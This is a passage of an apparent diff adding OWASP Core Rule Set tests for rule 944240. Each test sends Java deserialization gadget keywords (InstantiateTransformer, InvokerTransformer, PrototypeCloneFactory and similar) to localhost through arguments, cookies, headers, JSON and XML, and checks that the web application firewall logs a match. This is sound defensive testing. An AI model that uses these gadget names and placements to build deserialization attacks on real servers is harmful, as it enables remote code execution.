+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=runtime.instantiatefactory"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-32
+ desc: "Content-Type application/json arg value includes keyword runtime.instantiatefactory"
+ stages:
+ - stage:
+ input:
+
dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"runtime.instantiatefactory\"}"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-33
+ desc: "Content-Type application/json arg name includes keyword runtime.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"runtime.instantiatefactory\": \"test\"}"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-34
+ desc: "Argument test includes keyword runtime.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=runtime.instantiatetransformer"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-35
+ desc: "Argument name includes keyword runtime.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+
Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "runtime.instantiatetransformer=test"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-36
+ desc: "Cookie test includes keyword runtime.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=runtime.instantiatetransformer
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-37
+ desc: "Cookie name includes keyword runtime.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: runtime.instantiatetransformer=test
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-38
+ desc: "Request header test includes keyword runtime.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: runtime.instantiatetransformer
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-39
+ desc: "XML attribute value includes keyword runtime.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-40
+ desc: "XML element value includes keyword runtime.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "runtime.instantiatetransformer"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-41
+ desc: "Nested XML element value includes keyword runtime.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "runtime.instantiatetransformer"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-42
+ desc: "Content-Type text/plain includes keyword runtime.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host:
"localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=runtime.instantiatetransformer"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-43
+ desc: "Content-Type application/json arg value includes keyword runtime.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"runtime.instantiatetransformer\"}"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-44
+ desc: "Content-Type application/json arg name includes keyword runtime.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"runtime.instantiatetransformer\": \"test\"}"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-45
+ desc: "Argument test includes keyword runtime.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+
Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=runtime.invokertransformer"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-46
+ desc: "Argument name includes keyword runtime.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "runtime.invokertransformer=test"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-47
+ desc: "Cookie test includes keyword runtime.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=runtime.invokertransformer
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-48
+ desc: "Cookie name includes keyword runtime.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: runtime.invokertransformer=test
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id
\"944240\""
+ - test_title: 944240-49
+ desc: "Request header test includes keyword runtime.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: runtime.invokertransformer
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-50
+ desc: "XML attribute value includes keyword runtime.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-51
+ desc: "XML element value includes keyword runtime.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "runtime.invokertransformer"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-52
+ desc: "Nested XML element value includes keyword runtime.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept:
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "runtime.invokertransformer"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-53
+ desc: "Content-Type text/plain includes keyword runtime.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=runtime.invokertransformer"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-54
+ desc: "Content-Type application/json arg value includes keyword runtime.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"runtime.invokertransformer\"}"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-55
+ desc: "Content-Type application/json arg name includes keyword runtime.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version:
"HTTP/1.0"
+ data: "{\"runtime.invokertransformer\": \"test\"}"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-56
+ desc: "Argument test includes keyword runtime.prototypeclonefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=runtime.prototypeclonefactory"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-57
+ desc: "Argument name includes keyword runtime.prototypeclonefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "runtime.prototypeclonefactory=test"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-58
+ desc: "Cookie test includes keyword runtime.prototypeclonefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=runtime.prototypeclonefactory
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-59
+ desc: "Cookie name includes keyword runtime.prototypeclonefactory"
+
stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: runtime.prototypeclonefactory=test
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-60
+ desc: "Request header test includes keyword runtime.prototypeclonefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: runtime.prototypeclonefactory
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-61
+ desc: "XML attribute value includes keyword runtime.prototypeclonefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-62
+ desc: "XML element value includes keyword runtime.prototypeclonefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept:
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "runtime.prototypeclonefactory"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-63
+ desc: "Nested XML element value includes keyword runtime.prototypeclonefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "runtime.prototypeclonefactory"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-64
+ desc: "Content-Type text/plain includes keyword runtime.prototypeclonefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=runtime.prototypeclonefactory"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-65
+ desc: "Content-Type application/json arg value includes keyword runtime.prototypeclonefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+
data: "{\"test\": \"runtime.prototypeclonefactory\"}"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-66
+ desc: "Content-Type application/json arg name includes keyword runtime.prototypeclonefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"runtime.prototypeclonefactory\": \"test\"}"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-67
+ desc: "Argument test includes keyword runtime.prototypeserializationfactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=runtime.prototypeserializationfactory"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-68
+ desc: "Argument name includes keyword runtime.prototypeserializationfactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "runtime.prototypeserializationfactory=test"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-69
+ desc: "Cookie test includes keyword
runtime.prototypeserializationfactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=runtime.prototypeserializationfactory
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-70
+ desc: "Cookie name includes keyword runtime.prototypeserializationfactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: runtime.prototypeserializationfactory=test
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-71
+ desc: "Request header test includes keyword runtime.prototypeserializationfactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: runtime.prototypeserializationfactory
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-72
+ desc: "XML attribute value includes keyword runtime.prototypeserializationfactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+
headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-73
+ desc: "XML element value includes keyword runtime.prototypeserializationfactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "runtime.prototypeserializationfactory"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-74
+ desc: "Nested XML element value includes keyword runtime.prototypeserializationfactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "runtime.prototypeserializationfactory"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-75
+ desc: "Content-Type text/plain includes keyword runtime.prototypeserializationfactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language:
"en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-76 + desc: "Content-Type application/json arg value includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.prototypeserializationfactory\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-77 + desc: "Content-Type application/json arg name includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.prototypeserializationfactory\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-78 + desc: "Argument test includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP 